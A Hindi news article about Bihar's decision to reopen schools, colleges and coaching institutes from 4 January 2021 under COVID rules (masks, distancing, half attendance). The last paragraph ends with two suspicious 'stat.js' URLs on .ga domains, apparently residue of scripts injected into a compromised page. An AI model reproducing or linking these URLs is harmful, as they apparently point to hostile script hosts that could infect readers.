#

14 मार्च से बंद स्कूल कॉलेज को लेकर बिहार में अब फैसला ले लिया गया है। 2021 में 4 जनवरी से खुल सकते हैं स्कूल कालेज तथा कोचिंग संस्थान। संस्थान खुलने के बाद कोरोना गाइडलाइन का पालन अनिवार्य किया जाएगा। शुक्रवार को मुख्य सचिव दीपक कुमार की अध्यक्षता में कोई आपदा प्रबंधन समूह की बैठक में यह निर्णय लिया गया।

 

बैठक के बाद मुख्य सचिव ने जानकारी देते हुए बताया कि स्कूल कॉलेज प्रशासन की यह जिम्मेदारी होगी कि वह कक्षा और परिसर में मास्क का उपयोग और सोशल डिस्टेंसिंग का पालन सुनिश्चित कराएं। 18 जनवरी से 9वीं से निचले स्तर की कक्षाएं खुलेगी लेकिन इसके पहले सरकार समीक्षा करेगी कि जो कक्षाएं 4 जनवरी से चलाई जा रही है वहां किसी प्रकार की कोई दिक्कत तो नहीं है।

 

 

11 जनवरी के आसपास इसकी समीक्षा की जाएगी। कक्षा संचालन पर हम लोग सजग और सतर्क रहेंगे क्योंकि अभी भी या कहना मुश्किल है कि कोरोना संक्रमण का आगे क्या रुख हो सकता है इसकी निरंतर समीक्षा की जाएगी। संस्थान खुलने के बाद वहां 1 दिन में केवल 50% विद्यार्थी ही आएंगे। इसी के साथ साथ सरकारी स्कूलों के बच्चों को शिक्षा विभाग द्वारा 2,2 मास्क मुफ्त में उपलब्ध कराए जाएंगे।

 

मुख्य सचिव दीपक कुमार ने हॉस्टल खोलने के संबंध में बताया कि 4 जनवरी से कोचिंग की और से कक्षाएं चलाने का पूरा प्लान जिलाधिकारी के यहां देना होगा। कोचिंग संस्थानों से ही हॉस्टल जुड़े रहते हैं अपने प्लान में कोचिंग संचालक भी बताएंगे कि हॉस्टल को लेकर उनके क्या प्लान है?https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *